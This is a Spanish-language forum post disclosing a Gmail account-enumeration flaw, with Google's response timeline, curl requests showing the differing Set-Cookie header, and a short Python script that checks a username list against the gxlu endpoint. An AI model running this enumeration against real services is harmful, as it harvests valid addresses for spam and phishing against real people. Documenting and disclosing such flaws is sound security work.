Citar02/03/2017 14:54:00 (UTC + 1): póngase en contacto con Google con este número
02/03/2017 17:13:00 (UTC + 1): Respuesta de Google "su informe fue evaluado y actualmente estamos estudiando".
02/03/2017 17:27:00 (UTC + 1): Respuesta de Google "Decidimos encaminar internamente a un equipo que se ocupa de cuestiones similares"
22/03/2017 00:56:00 (UTC + 1): Respuesta de Google "No nos hemos olvidado de su informe; Todavía estamos buscando en él y volveremos a usted en un par de días. "
31/03/2017 16:29:00 (UTC + 1): Google decidió no clasificar esto como un bug de seguridad ¯ \ _ (ツ) _ / ¯

Esto solo es fuerza bruta, si buscas algo jugoso como un 0day pásate de largo  ;)

Vulnerabilidad:
La URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta nos permite saber si un usuario/correo_electrotécnico esta registrado o dado de alta en el servicio, ¿Como? pues al no estar registrado da una respuesta diferente en: headers, Ejemplo:

Código: php

$ curl -v https://mail.google.com/mail/gxlu?email=<cuenta_activa>
[...]
< HTTP/1.1 204 No Content
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: Mon, 01 Jan 1990 00:00:00 GMT
< Date: Thu, 02 Mar 2017 11:43:10 GMT
< Server: GSE
< Set-Cookie: S=gmail=ilixOdEvDf9fbi2w4OYwRIQkpUcwCKK6; Expires=Thu, 02-Mar-2017 12:43:10 GMT; Path=/mail; Secure; HttpOnly
< Set-Cookie: COMPASS=gmail=CmYACWuJVycLtY31gmk6cAgFQBfuovcN3rfKw05y2kngwptEGIyez478x5O1fJW-dxF4sDChgHulPqu5kDjgCnEQGi0egQkahglkL6Hl5ANZ-v4zRnzWdYxjtZ_8aV6bhAs8w2uH1X8Ql6fgxQUabwAJa4lX4mDPO08mNP4srg8ScUYXcW-bcdfx7U78Xa2IgEGwfn2EZPlDFm5B1b97cyOzPhliiPGhdsfb0PQysYCiVIw2sVb-Ayyq1-S6aFlcsPpwru06Kh64grTP3ZMLSaCE5hF_gjDTXxZ4Xl0S0Q; expires=Sun, 12-Mar-2017 11:43:10 GMT; path=/mail; Secure; HttpOnly
< Alt-Svc: quic=":443"; ma=2592000; v="35,34"


Y si probamos con una cuenta inexistente:

Código: php

$ curl -v https://mail.google.com/mail/gxlu?email=<cuenta_inexistente>
[...]
< HTTP/1.1 204 No Content
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: Mon, 01 Jan 1990 00:00:00 GMT
< Date: Thu, 02 Mar 2017 11:42:08 GMT
< Server: GSE
< Alt-Svc: quic=":443"; ma=2592000; v="35,34"


Como podemos observar el servidor agrega en: headers el encabezado Set-Cookie, esto solo para las cuentas activas/registradas

Explotación:
Para poder aprovecharnos de esta vulnerabilidad podemos crear un script que intente adivinar que cuentas estan registradas en el servicio, por ejemplo: (Este ejemplo es básico no intenta ser una herramienta, solo es la base o lógica de explotación)

Código: python

import requests

cuentas = ["juan123123123.002", "pedrovazquez", "juanperez", "lkasjdklasjdajsdal", "as1321223123d100012", "qwerty002"]

def set_cookie(cuentas):
try:
url = requests.get("https://mail.google.com/mail/gxlu?email=" + cuentas + "@gmail.com")
test = url.headers['set-cookie']
print cuentas+"@gmail.com"
except KeyError:
pass

for i in cuentas:
set_cookie(i)


Al ejecutar el script nos damos cuenta que solo imprimirá por pantalla las cuentas que estén activas de las lista: cuentas.



Impacto:
Este error puede ser explotado con fines maliciosos como: campañas de marketing agresivas (es decir, recibir correos electrónicos no solicitados) o en el peor de los casos ataques de phishing y ransomware, como de costumbre.

Este post fue realizado con fines educativos y de prevención y en ningún caso para promover acciones ilegales o delictivas.

...